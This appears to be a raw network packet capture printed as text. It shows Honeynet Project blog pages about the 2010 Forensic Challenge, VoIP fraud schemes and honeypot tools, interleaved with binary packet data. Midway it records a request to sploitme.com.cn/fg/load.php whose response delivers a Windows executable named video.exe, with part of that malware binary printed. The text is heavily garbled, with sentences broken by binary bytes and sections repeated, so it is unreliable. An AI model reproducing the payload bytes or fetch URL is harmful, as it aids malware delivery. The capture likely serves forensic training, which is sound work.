    I am very happy to announce the Honeynet Project Forensic Challenge 2010. The purpose of the Forensic Challenges is to take learning one step farther. Instead of having the Honeynet Project analyze attacks and share their findings, Forensic Challenges give the security community the opportunity to analyze attacks and share their findings. In the end, individuals and organizations not only learn about threats, but also learn how to analyze them. Even better, individuals can access the write-ups from other individuals, and learn about new tools and techniques for analyzing attacks. Best of all, the attacks of the Forensic Challenge are attacks encountered in the wild, real hacks, provided by our members.


    It has been several years since we provided Forensic Challenges and with the Forensic Challenge 2010, we will provide desperately needed upgrades. The Forensic Challenge 2010 will include a mixture of server-side attacks on the latest operating systems and services, attacks on client-side attacks that emerged in the past few years, attacks on VoiP systems, web applications, etc. At the end of challenge, we will provide a sample solution created by our members using the state-of-the-art tools that are publicly available, such as libemu and dionaea.


    The first challenge (of s;=K'_RT5E\@@r PWbՃPSleveral for 2010) will be posted on our Forensic Challenges web site on Monday, January 18th 2010. We will be open to submissions for about two weeks and announce the winners by February 15th 2010. This year, we will also award the top three submissions with prizes! Please check the web site on Monday, January 18th 2010 for further details...



    Christian Seifert

    Chief Communications Officer
    The Honeynet Project

    Italian Chapter updates

    Main blog - Wed, 12/16/2009 - 09:41
    Folks, I would like to inform you all about our recent activities that we are attempting to achieve. First of all, we have totally rebuilt our web site. This new ones aim to be a central repository of all the (external/internal) news concerning botnets (mainly) and malwares (secondary). We will use the blog for posting abou;=K'<<RT5'_E(6@6 @rWPՃP3;=K<<RT5'_E(7@6 @rWPՃP(P;=KЫ'_RT5E]@@r PWՃP4t our project developments, and for commenting/reporting interesting news concerning the field that we are currently treating, so you can now add a new entry to your feeds reader :)

    VOIP phoneynet : PART 3 "WHAT WOULD CROOKS DO WITH A COMPROMISED VOIP GATEWAY ANYWAY?"

    Australian Blog - Sat, 12/05/2009 - 13:55

    There are quite a few ways that a criminal can make use of a compromised VOIP server. Its important to realize that the criminal mind is very imaginative, and there will be many motives and scams that we have not even imagined yet, much less experienced.
    When looking at these types of questions, I think it helps to have the notion of motive in the back of your mind. This may sound obvious, but I find this helps answer the question 'what would a person or group with this motivation want with a compromised VOIP system?'.

    Here are some;=K)'_RT5E^@@r PWՃP4 potential motives. While I won't go into every possible scenario, it's really not hard to imagine that the full control of target's phone system would be handy for people with any of these motives.

  • Financial gain
  • Political
  • Religious
  • Reputation and ego of the hacker
  • Intellectual Property theft, Trade Secrets
  • Espionage
  • Retribution, commercial or personal
  • Vandalist, miscreant activity (bored youth..)
  • I got some great local and international feedback on incidents from readers of Part 1 and Part 2 of this blog series (Thank you everyone). Most of these incidents seem to fall into the 'Financial gain' motive group, so I'll give two examples of a common attacks which are currently seen in AU and overseas, and a possible future threat.

    Cheap overseas calls / calling cards.
    One of the most common uses for hacked VOIP servers is to simply make unauthorized calls, and there have been incidents of hacked VOIP servers being used in relation to calling card scams to do just this. This is not to say that all cheap calling cards operations are scams, most I'm sure are legitimate.
    Here is a brief overview of a simple version of the scam:

  • The crook controls a hacked VOIP system in (say) Australia. This ;=K<<RT5'_E(8@6 @rWPՃBP;=K'_RT5E_@@r PWBՃPt~means that they can accept and redirect calls, and essentially control every aspect of that phone system.
  • The crook sells 'calling cards' to citizens of another country that live in, or are visiting Australia. The card allows them to call home at ridiculously cheap rates, a tiny fraction of the cost of a legitimate overseas call.
  • The buyer of the calling card is instructed to call a local (probably legitimate) number in Australia and then enter in the international number they are trying to reach. The crook then reroutes these calls through VOIP to the hacked system, which then makes the international call. This functionality could potentially be turned off periodically to evade being uncovered, and could even be configured to only use the hacked VOIP server for calls to a specific set of countries.
  • The buyer of the calling card of course could not be aware that the call was routed through a hacked VOIP system, they are just happy to have spoken to family and friends at a cheap rate.
  • Note also that it is entirely possible for the calls to be re-routed through an entire chain of hacked VOIP servers in more 2 or 3 different countries, effectively 'laundering the call' by making it harder to track down if an investigation is ever launched. Jurisdictional/timezone/culture and language differences are some of the most challenging hurdles faced by cybercrime investigators, and the;=KN'_RT5E`@@r PWՃP crooks know how to take advantage of this (I aim to explore these aspects in a later instalment of this blog series)
  • The important thing is that the calling card holder just got an overseas call for the cost of a local call, plus the crooks margin, so they are not really the victim. The owner of the hacked VOIP server however may (or may not depending the size of a normal bill) realize that something is amiss when they get their next phone bill, as it was their system that made the calls. We have heard a few stories of this occurring (in Australia and abroad), where the victim's telephone bill inexplicably sky-rocketed by over $20,000 in one case here in Australia!

    Premium rate number calling
    This attack predates VOIP by many years, first being used on standard corporate PABX systems. VOIP has made this much more lucrative for the crooks due to the call volumes it allows.

    The scam is fairly simple.

  • Crook has control of hacked VOIP system(s) for which the victim gets bills for on a monthly basis. This VOIP system may belong to a corporate entity, and so may be capable of making many concurrent calls.
  • The crook has a premium rate 1900 number, for which they collect revenue on a weekly or daily basis.
  • Crook gets the hacked VOIP system to make multiple, repeated calls to the 1900 number, thus adding to the account of the 1900 number, at the expe;=KP<<RT5'_E(9@6 @rWPՃPGET /c;=K_'_RT5Ea@@r PWՃP` nse of the owner of the hacked VOIP system.
  • Crook collects the revenue from the 1900 number every day/week until someone notices.
  • In this case, the victim may not realise they have been hacked until they receive the bill at the end of the month, by which time the crook has made off with potentially hundreds of thousands of dollars over at least 2 weekly collection periods.
    Note also that there is a money trail here, so the crook must also engage in other crime types such as identity theft, money laundering etc to actually get cash out.

    Future threat – Denial of Service
    The motive behind this attack could probably be any of the ones listed above.
    I've not heard of any instances of this, but it's worthwhile considering how we would deal with the threat of Denial of Service on Voice systems. This could be as simple as an attacker using a hacked VOIP system to dial multiple concurrent calls into a target's phone numbers (VOIP, or PSTN for that matter) which would exhaust all of the available connections, even ISDN/PSTN indials??. Remember that SIP, the predominant VOIP protocol is UDP (connectionless) and being an Internet protocol could be emulated/faked, so perhaps a hacked VOIP system wouldn't even be required to effect a DOS.
    This area needs much more research and consideration from authorities much better funded and capable than us, and yes ;=Kɓ'_RT5Eb@@r PW"ՃPwe are more than happy to brainstorm ideas on threat scenarios and mitigations with the appropriate agencies/researchers, just contact us.

    Given the importance of voice systems both for commerce and its use in emergency situations, it's imperative that threat scenarios are identified and risks are mitigated to within acceptable tolerances. I hope this blog gives some background info to organizations who are starting to consider the threats they face, and put in place appropriate controls and response plans.

    Next in the blog series is PART 4 "HOW BEST TO PROTECT AGAINST VOIP THREATS". Feel free to contact me at ben@honeynet.org.au with any feedback, or input into the next one.

    Nepenthes Pharm

    Main blog - Sun, 11/29/2009 - 18:32
    Parvinder Bhasin asked us to post an announcement about his new tool. While not officially a tool developed by the Honeynet Project, we thought you should know about some of the great work he is doing. N;=K9<<RT5'_E(:@6 @rWPՃPp DIE;=KO'_RT5Ec@@r PWšՃPjJepenthes PHARM is a perfect companion to your Nepenthes honeypot installations. PHARM is an Open Source client/server and web portal package, which provides central reporting and analysis of your distributed Nepenthes based honeypots.

    Know Your Tools: use Picviz to find attacks

    Main blog - Thu, 11/26/2009 - 17:27
    We are very excited to announce the publication of our first paper in the new Know Your Tools paper series: “KYT: use Picviz to find attacks” authored by Sebastien Tricaud from the French Chapter and Victor Amaducci from the University of Campinas.

    The paper can be downloaded at Know Your Tools: use Picviz to find attacks.

    Paper Abstract
    Picviz is a parallel coordinates plotter which enables easy scripting from various input (tcpdump, syslog, iptables logs, apache logs, etc..) to visualize data and discover interesting aspects of that data quickly. Picviz uncovers previously hidden data that is ;=K&'_RT5Ed@@r PWbՃPodifficult to identify with traditional analysis methods.

    In the first paper of our new Know Your Tools series, Sebastien Tricaud from the French Honeynet Project Chapter and Victor Amaducci from the University of Campinas, focus on Picviz. After a brief overview on parallel coordinates, Picviz architecture, and installation procedure, three real-world examples are presented that illustrate how to identify attacks from large amounts of data: Picviz is used to analyze SSH logs, Apache access logs and network traffic. With these examples, it is demonstrated how Picviz can find attacks that previously have been hidden.


    Recent additions to Picviz GUI have been made by Victor Amaducci under the mentorship of Sebastien Tricaud as part of the Google Summer of Code program 2009. The most recent version of Picviz is freely available for download from its project site at http://www.wallinfire.net/picviz and support can be sought from the Picviz mailing list at http://www.wallinfire.net/cgi-bin/mailman/listinfo/picviz..

    RE-Google in action - screenshot

    Main blog - Sun, 11/15/2009 - 22:49

    RE-Google in action - screenshot

    Main blog - Sun, 11/15/2009 - 22:34

    RE-Google Architecture

    Main blog - Sun, 11/15/2009 - 22:31

    RE-Google - or how Grandma started Reverse Engineering

    Main blog - Sun, 11/15/2009 - 22:20
    Some people say "Reverse Engineering is an art". Well, this might be true if you consider stuff like mathematics as art. It is more an application of standard methods that evolve constantly. Actually, everybody can learn these methods and start to RE executables. With the RE-Google plugin for IDA Pro, even your granny can start reversing :)

    Glastopf

    Main blog - Sat, 10/17/2009 - 19:19
    Web sites are hacked all the time. Web application, database, and cross-site scripting vulnerabil;=K <<RT5'_E(<@6 @rWPՃBP;=KI '_RT5Eg@@r PWBՃPities expose a large attack surface that can be exploited to, among others, deface the web site, send spam, convert web site into bots, and serve drive-by-download attacks. Glastopf is a low-interaction honeypot that emulates a vulnerable web server hosting many web pages and web applications with thousands of vulnerabilities. Glastopf is easy to setup and once indexed by search engines, attacks will pour in by the thousands daily. Glastopf has been developed as part of the 2009 Google of Summer Code by student Lukas Rist (and mentored by Thorsten Holz of the German Honeynet Project Chapter). It can be downloaded from the Glastopf trac site at http://trac.glastopf.org/trac. More information on Glastopf can be found on the project site at http://glastopf.org/.
    Syndicate content
    ;=K6f <<RT5'_E(=@6 @rWPՃPŋGET /c;=KƂ ;;'_RT5E-i@f@r PW駚ՃPt0 ;=K 66'_RT5E(j@j@r PW鬚ՃP;=Kǚ <<RT5'_E(>@6 @rWPՃPņ;=K <<RT5'_E(?@6 @rWPՃP;=K <<RT5'_E(@@6 @rWPՃPGET /c;=K/ 66'_RT5E(k@i@r PW魚ՃP;=K '_EA  /xU  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE 8FD12EDD2DC1462;=K '_EB  /wV  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE 8FD12EDD2DC1462;=K# '_EC  /vW  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE 8FD12EDD2DC1462;=K '_ED  /uX  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE 8FD12EDD2DC1462;=KTTRT5'_EFEg 52eͪwwwgoogle-analyticscom;=KA'_RT5El@$ 5ͪwwwgoogle-analyticscom #www-google-analyticslgooglecom6OJ}Mf6OJ}Md6OJ}Me;=K>>RT5'_E0F@Q J}MfXP;ypV;=K::'_RT5E,m@mJ}Mf PX@;z`;=Kk<<RT5'_E(H@Q J}MfXP;z@P ;=KdRT5'_EI@N J}MfXP;z@PoGET /__utm.gif?utmwv=4.6.5&utmn=1265451123&utmhn=www.honeynet.org&utmcs=utf-8&utmsr=1088x729&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=6.0%20r79&utmdt=Honeynet%20Project%20Blog%20%7C%20The%20Honeynet%20Project&utmhid=1706076767&utmr=-&utmp=%2F&utmac=UA-372404-7&utmcc=__utma%3D121888786.1305690527.1264085162.1265310286.1265310375.6%3B%2B__utmz%3D121888786.1264085162.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B HTTP/1.1 Accept: */* Referer: http://www.honeynet.org/ Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: www.google-analytics.com Connection: Keep-Alive ;=K66'_RT5E(n@pJ}Mf PX@>P=;=K# pp'_RT5Ebo@5J}Mf PX@>PHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:05:51 GMT Content-Length: 35 Pragma: no-cache Expires: Wed, 19 Apr 2000 11:44:00 GMT Last-Modified: Wed, 21 Jan 2004 19:50:30 GMT Content-Type: image/gif Server: Golfe Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate X-XSS-Protection: 0 ;=K]$ YY'_RT5EKp@KJ}Mf PXA<>PwGIF89a,D;;=K& <<RT5'_E(K@Q J}MfXP>A_P LGET /c;=K nn'_E`L4  LT8Y) FHEPFCELEHFCEPFFFACACACACACACABN   ;=K\5nn'_E`M3  LT8Y) FHEPFCELEHFCEPFFFACACACACACACABN   ;=KIlnn'_E`N2  LT8Y) FHEPFCELEHFCEPFFFACACACACACACABN   ;=K nn'_E`O1  LU8Y( FHEPFCELEHFCEPFFFACACACACACACABN   ;=K> nn'_E`P0  L4Z) ABACFPFPENFDECFCEPFHFDEFFPFPACAB   ;=KXnn'_E`Q/  L4Z) ABACFPFPENFDECFCEPFHFDEFFPFPACAB   ;=K nn'_E`R.  L4Z) ABACFPFPENFDECFCEPFHFDEFFPFPACAB   ;=K nn'_E`S-  L4Z( ABACFPFPENFDECFCEPFHFDEFFPFPACAB   ;=K66'_RT5E(q@su83 PR FP/;=KM<<RT5'_E(T@ 83RPF PKGET /c;=K66'_RT5E(r@st83 PS P;=K<<RT5'_E(U@ 83SP PK}GET /c;=KO7 '_EV  ‚[  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACAAASMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462;=K7 '_EW  N\  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA ABACFPFPENFDECFCEPFHFDEFFPFPACABSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462;=KI '_EX  ]  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA ABACFPFPENFDECFCEPFHFDEFFPFPACABSMB%00VA\MAILSLOT\BROWSE `WORKGROUPXj 8FD12EDD2DC1462;=K66'_RT5E(s@sr84 PTD0IaAPz;=Kw<<RT5'_E(Y@ 84TPIaAD1Pg;=K5<<RT5'_E(Z@ 83RPF P+ DIE;=K<<RT5'_E([@ 83SP P;=K3'_E\  3^  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA FHEPFCELEHFCEPFFFACACACACACACABOSMB%!!V2\MAILSLOT\BROWSE8FD12EDD2DC1462U;=K1 <<RT5'_E(]@ 84TPIaAD1Pg;=KP2 66'_RT5E(t@sq84 PTD1IaBPy;=K >>RT5'_E0^@~ 84ZPZp;=KI ::'_RT5E,u@sl84 PZ{ Z`z;=Kt <<RT5'_E(`@ 84ZPZ{ PF;=KKRT5'_Ea@ 84ZPZ{ P wGET /fg/load.php?e=3 HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: sploitme.com.cn Connection: Keep-Alive ;=KL66'_RT5E(v@so84 PZ{ ZPu;=K_'_RT5Ew@m84 PZ{ ZPHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:07:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Accept-Ranges: bytes Content-Length: 12288 Content-Disposition: inline; filename=video.exe Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/octet-stream MZ@ !L!This program cannot be run in DOS mode. $PEL 1Ҁ …tLtt8EAEAQ P@AA fAB AJ ]ÍvU1D$ 1D$E D$E$Ív'US]u[]$>D$$[]ÍUU EBEBEBJB P@B fBA BQ ]É'U1D$ 1D$E D$E$Ív'U$D$E$Í'US]tmtgP@J z t'9X t`H@uzJB 9t*BJt?Bu9Z uӋSZ[]Z1[]ÉӋRC $ËSt&'U]G&UEuÉ$EN&'U1ɉE p@t[FtUBt*)‰Ѓ;EtEUGEt&u,FtEtBt@B뗃[^_]Í&U؍ED$F$w HE띸E듍v'UWVSE@E‹U>E p@FtUBt*)‰Ѓ;EtEUGE;=Kj'_RT5E{@m84 PZ{"ZPF%t&uV҉UN MtE)9saU؍ED$F$$ٍUT$1҉w) HU9M1[^_]ø UWVS|UPEu0@ EM̅hu1U9VMԋI Eq9uMus{t&'}uE|_)؃`U؉UT$W$‰$ML$1҉E9Euu9ur1|[^_]ÍMԋY uЉ4$Eu̓uY 3t$&'EcE̋3uMԋE̋Q  ‰ ;EQM̅E̍$rE{@$XEt@UBhZ t$UEuE E@E@u@E @tE@@U҉UUM1ۡP@MQωMp9ӉUr%t&EtCw;]P@9t݋D$UDD$Mԉ $UȅyUM)Ћ4M9EoFuu UB%uJJ 1ҋyM9u :\Cs 9E9ًuԋV E*U؉؋R UUNEMEq9u]؃E 9um]M܋U|L$G$UE$U؉T$E1E9ErU9EqC]롍&;EQ9 EԋMЋP $|[^_]ËuԉVu9pUMUM111;Ms*'uċtuDCDB;]rߋEuPUĉJMVA;EuE$UȋEUuzUtY^MOLM(ED$DD$Uԉ$Uȅ~D;KDuԋM;LuUMB;=Kzk'_RT5E|@m84 PZ{(JZPOFMu4$MԋUA IQ uDuCDA;]+MԍUA $E$UȋE량uvUW1VS P@sE9vu&s FUC 5P@NjCStm9rfP@u1F2tFU FBF%Fu^؉yU T$W$‰0 [^_]ËF2WFU FBF%FtW)Ѓx둉‰m^P@UP@]HU8STT$U1ۉT$$L u=Jx|Au Jy;$u؋]$@@@@T$D$ $A@@@\$L$&'UWVS P@te[^_]EAAAA@@uEAAAAEAAAAEȡ@@EAAAAEAAAAE̡@@EAAAAEAAAAEС@@EAAAAEԡ@@Eء@@E܉4$_d$$Njd $`P@C+@C@(@CtP@pP@S C&'!ȃ$ AhJy硠@@E@@E@@E@@E@@E@@Eh$yuA1҅u$4$iÉP@CP@CP@e[^_]É9؉u Q=r -) ̋@%\a@%ta@%|a@%la@%a@%pa@%a@%ha@%a@%a@%a@%a@%a@%a@%xa@%a@%La@% a@%4a@%(a@%Pa@;=Kl'_RT5E}@m84 PZ{-ZP%a@%Da@%Ha@%a@%size == sizeof(W32_EH_SHARED)/opt/local/var/macports/build/_opt_local_var_macports_sources_rsync.macports.org_release_ports_cross_i386-mingw32-gcc/work/gcc-3.4.5-20060117-1/gcc/config/i386/w32-shared-ptr.cGetAtomNameA (atom, s, sizeof(s)) != 0| ;=Kq<<RT5'_E(e@ 84ZPZ{(JP<;=K!r'_RT5E~@m84 PZ{3ZP^@@AB D4@"AB LP@AB Fl@oAB F!@}AB F'@(AB AGh`da`d\a`ldhaa|daaaaaabb(b__p__fmodeP__set_app_typeo_asserty_cexit_iob^_onexit_setmodeabortatexit?freermallocsignalsp;=K'_RT5E@n84 PZ{9NZPLrintfstrlenstrncmpMessageBoxA````````````````KERNEL32.dll`msvcrt.dll(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`(`msvcrt.dll<`USER32.dllurlRetriever|http://www.honeynet.org;=K<<RT5'_E(f@~ 84ZPZ{3P<;=K<<RT5'_E(g@} 84ZPZ{3P;=K<<RT5'_E(h@| 84ZPZ{=PԀ;=K<<RT5'_E(i@{ 84ZPZ{=Pv;=K>>RT5'_E0s@6Y @r]P\hpn;=KU::'_RT5E,@P@r P]\h`i;=K,Y<<RT5'_E(u@6_ @r]P\hP5 DIEGE;=KQ6RT5'_Ev@4 @r]P\hPGET / HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: www.honeynet.org Connection: Keep-Alive Cookie: SESS0f916077214db25d3c25b38417a57722=c3c14637ee4fa2f3ced7dfe9b7f77eb9; __utma=121888786.1305690527.1264085162.1265310286.1265310375.6; __utmz=121888786.1264085162.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=121888786.1.10.1265310375 ;=K766'_RT5E(@S@r P]\hPZ;=K!r'_RT5E@@r P]\hPHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:07:46 GMT Server: Apache X-Powered-By: PHP/4.3.9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Tue, 02 Feb 2010 19:07:46 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 6c34 Honeynet Project Blog | The Honeynet Project
    To learn the tools, tactics and motives involved in computer and network attacks, and share the lessons learned.

    Honeynet Project Blog

    First challenge of the Forensic Challenge 2010 has been posted.

    Main blog - Mon, 01/18/2010 - 07:21
    We have just posted the first challenge of the Forensic Challenge 2010. The first challenge deals with a network attack. It has been provided by Tillmann Werner from the Giraffe Chapter. It is accessible at https://honeynet.org/node/504. Submissions are due on Monday, February 1st 2010 and results will be released on Monday, February 15th 2010. The top three submissions will be awarded with small prizes. Check it out!

    Challenge 1 of the Forensic Challenge 2010 - pcap attack trace

    Main blog - Mon, 01/18/2010 - 06:18
    Forensic Challenge 2010 Challenge 1 - pcap attack trace - (provided by Tillmann Werner from the Giraffe Chapter) is to investigate a network attack.

    Send submissions (please use the MS word submission template or the Open Office submission template) forensicchallenge2010@honeynet.org no later then 17:00 EST, Monday, February 1st 2010. Results will be released on Monday, February 15th 2010. Small prizes will be awarded to the top three submissions.


    Skill Level: Intermediate

    The Challenge:

    A network trace with attack data is provided. (Note that the IP address of the victim has been changed to hide the true location.) Analyze and answer the following questions:

    1. Which systems (i.e. IP addresses) are involved? (2pts)
    2. What can you find out about the attacking host (e.g., where is it located)? (2pts)
    3. How many TCP sessions are contained in the;=K <<RT5'_E(|@6X @r]P\h"PI FHEPF;=KI '_RT5E@@r P]"\hP dump file? (2pts)
    4. How long did it take to perform the attack? (2pts)
    5. Which operating system was targeted by the attack? And which service? Which vulnerability? (6pts)
    6. Can you sketch an overview of the general actions performed by the attacker? (6pts)
    7. What specific vulnerability was attacked? (2pts)
    8. What actions does the shellcode perform? Pls list the shellcode. (8pts)
    9. Do you think a Honeypot was used to pose as a vulnerable victim? Why? (6pts)
    10. Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge) (2pts)
    11. Do you think this is a manual or an automated attack? Why? (2pts)
    Download:
    attack-trace.pcap_.gz Sha1: 0f5ddab19034b2656ec316875b527d9bff1f035f

    Announcing the Honeynet Project Forensic Challenge 2010

    Main blog - Tue, 01/12/2010 - 17:34

    I am very happy to announce the Honeynet Project Forensic Challenge 2010. The purpose of the Forensic Challenges is to take learning one step farther. Instead of having the Honeynet Project analyze attacks and share their findings, Forensic Challenges give the security community the opportunity to analyze attacks and share their findings. In the end, individuals and organizations not only learn about threats, but also learn how to analyze them. Even better, individuals can access the write-ups from other individuals, and learn about new tools and techniques for analyzing attacks. Best of all, the attacks of the Forensic Challenge are attacks encountered in the wild, real hacks, provided by our members.


    It has been several years since we provided Forensic Challenges and with the Forensic Challenge 2010, we will provide desperately needed upgrades. The Forensic Challenge 2010 will include a mixture of server-side attacks on the latest operating systems and services, attacks on client-side attacks that emerged in the past few years, attacks on VoiP systems, web applications, etc. At the end of challenge, we will provide a sample solution created by our members using the state-of-the-art tools that are publicly available, such as libemu and dionaea.


    The first challenge (of s;=Kq <<RT5'_E(~@6V @r]P\hbP DIE;=K& '_RT5E@@r P]b\hPeveral for 2010) will be posted on our Forensic Challenges web site on Monday, January 18th 2010. We will be open to submissions for about two weeks and announce the winners by February 15th 2010. This year, we will also award the top three submissions with prizes! Please check the web site on Monday, January 18th 2010 for further details...



    Christian Seifert

    Chief Communications Officer
    The Honeynet Project

    Italian Chapter updates

    Main blog - Wed, 12/16/2009 - 09:41
    Folks, I would like to inform you all about our recent activities that we are attempting to achieve. First of all, we have totally rebuilt our web site. This new ones aim to be a central repository of all the (external/internal) news concerning botnets (mainly) and malwares (secondary). We will use the blog for posting abou;=K <<RT5'_E(@6U @r]P\hPP GET /f;=KU'_RT5E@@r P]\hPt our project developments, and for commenting/reporting interesting news concerning the field that we are currently treating, so you can now add a new entry to your feeds reader :)

    VOIP phoneynet : PART 3 "WHAT WOULD CROOKS DO WITH A COMPROMISED VOIP GATEWAY ANYWAY?"

    Australian Blog - Sat, 12/05/2009 - 13:55

    There are quite a few ways that a criminal can make use of a compromised VOIP server. Its important to realize that the criminal mind is very imaginative, and there will be many motives and scams that we have not even imagined yet, much less experienced.
    When looking at these types of questions, I think it helps to have the notion of motive in the back of your mind. This may sound obvious, but I find this helps answer the question 'what would a person or group with this motivation want with a compromised VOIP system?'.

    Here are some;=K'_RT5E@@r P]\hP potential motives. While I won't go into every possible scenario, it's really not hard to imagine that the full control of target's phone system would be handy for people with any of these motives.

  • Financial gain
  • Political
  • Religious
  • Reputation and ego of the hacker
  • Intellectual Property theft, Trade Secrets
  • Espionage
  • Retribution, commercial or personal
  • Vandalist, miscreant activity (bored youth..)
  • I got some great local and international feedback on incidents from readers of Part 1 and Part 2 of this blog series (Thank you everyone). Most of these incidents seem to fall into the 'Financial gain' motive group, so I'll give two examples of a common attacks which are currently seen in AU and overseas, and a possible future threat.

    Cheap overseas calls / calling cards.
    One of the most common uses for hacked VOIP servers is to simply make unauthorized calls, and there have been incidents of hacked VOIP servers being used in relation to calling card scams to do just this. This is not to say that all cheap calling cards operations are scams, most I'm sure are legitimate.
    Here is a brief overview of a simple version of the scam:

  • The crook controls a hacked VOIP system in (say) Australia. This ;=K&<<RT5'_E(@6R @r]P\hBP) DIEGE;=K"'_RT5E@@r P]B\hPmeans that they can accept and redirect calls, and essentially control every aspect of that phone system.
  • The crook sells 'calling cards' to citizens of another country that live in, or are visiting Australia. The card allows them to call home at ridiculously cheap rates, a tiny fraction of the cost of a legitimate overseas call.
  • The buyer of the calling card is instructed to call a local (probably legitimate) number in Australia and then enter in the international number they are trying to reach. The crook then reroutes these calls through VOIP to the hacked system, which then makes the international call. This functionality could potentially be turned off periodically to evade being uncovered, and could even be configured to only use the hacked VOIP server for calls to a specific set of countries.
  • The buyer of the calling card of course could not be aware that the call was routed through a hacked VOIP system, they are just happy to have spoken to family and friends at a cheap rate.
  • Note also that it is entirely possible for the calls to be re-routed through an entire chain of hacked VOIP servers in more 2 or 3 different countries, effectively 'laundering the call' by making it harder to track down if an investigation is ever launched. Jurisdictional/timezone/culture and language differences are some of the most challenging hurdles faced by cybercrime investigators, and the;=KFR'_RT5E@@r P]\hP( crooks know how to take advantage of this (I aim to explore these aspects in a later instalment of this blog series)
  • The important thing is that the calling card holder just got an overseas call for the cost of a local call, plus the crooks margin, so they are not really the victim. The owner of the hacked VOIP server however may (or may not depending the size of a normal bill) realize that something is amiss when they get their next phone bill, as it was their system that made the calls. We have heard a few stories of this occurring (in Australia and abroad), where the victim's telephone bill inexplicably sky-rocketed by over $20,000 in one case here in Australia!

    Premium rate number calling
    This attack predates VOIP by many years, first being used on standard corporate PABX systems. VOIP has made this much more lucrative for the crooks due to the call volumes it allows.

    The scam is fairly simple.

  • Crook has control of hacked VOIP system(s) for which the victim gets bills for on a monthly basis. This VOIP system may belong to a corporate entity, and so may be capable of making many concurrent calls.
  • The crook has a premium rate 1900 number, for which they collect revenue on a weekly or daily basis.
  • Crook gets the hacked VOIP system to make multiple, repeated calls to the 1900 number, thus adding to the account of the 1900 number, at the expe;=KU<<RT5'_E(@6Q @r]P\hP~wwwh;=KE'_RT5E@@r P]\hP&nse of the owner of the hacked VOIP system.
  • Crook collects the revenue from the 1900 number every day/week until someone notices.
  • In this case, the victim may not realise they have been hacked until they receive the bill at the end of the month, by which time the crook has made off with potentially hundreds of thousands of dollars over at least 2 weekly collection periods.
    Note also that there is a money trail here, so the crook must also engage in other crime types such as identity theft, money laundering etc to actually get cash out.

    Future threat – Denial of Service
    The motive behind this attack could probably be any of the ones listed above.
    I've not heard of any instances of this, but it's worthwhile considering how we would deal with the threat of Denial of Service on Voice systems. This could be as simple as an attacker using a hacked VOIP system to dial multiple concurrent calls into a target's phone numbers (VOIP, or PSTN for that matter) which would exhaust all of the available connections, even ISDN/PSTN indials??. Remember that SIP, the predominant VOIP protocol is UDP (connectionless) and being an Internet protocol could be emulated/faked, so perhaps a hacked VOIP system wouldn't even be required to effect a DOS.
    This area needs much more research and consideration from authorities much better funded and capable than us, and yes ;=Ko<<RT5'_E(@6N @r]P\h"PP~;=KA '_RT5E@@r P]"\hPwe are more than happy to brainstorm ideas on threat scenarios and mitigations with the appropriate agencies/researchers, just contact us.

    Given the importance of voice systems both for commerce and its use in emergency situations, it's imperative that threat scenarios are identified and risks are mitigated to within acceptable tolerances. I hope this blog gives some background info to organizations who are starting to consider the threats they face, and put in place appropriate controls and response plans.

    Next in the blog series is PART 4 "HOW BEST TO PROTECT AGAINST VOIP THREATS". Feel free to contact me at ben@honeynet.org.au with any feedback, or input into the next one.

    Nepenthes Pharm

    Main blog - Sun, 11/29/2009 - 18:32
    Parvinder Bhasin asked us to post an announcement about his new tool. While not officially a tool developed by the Honeynet Project, we thought you should know about some of the great work he is doing. N;=Kg '_RT5E@@r P]$\hPcepenthes PHARM is a perfect companion to your Nepenthes honeypot installations. PHARM is an Open Source client/server and web portal package, which provides central reporting and analysis of your distributed Nepenthes based honeypots.

    Know Your Tools: use Picviz to find attacks

    Main blog - Thu, 11/26/2009 - 17:27
    We are very excited to announce the publication of our first paper in the new Know Your Tools paper series: “KYT: use Picviz to find attacks” authored by Sebastien Tricaud from the French Chapter and Victor Amaducci from the University of Campinas.

    The paper can be downloaded at Know Your Tools: use Picviz to find attacks.

    Paper Abstract
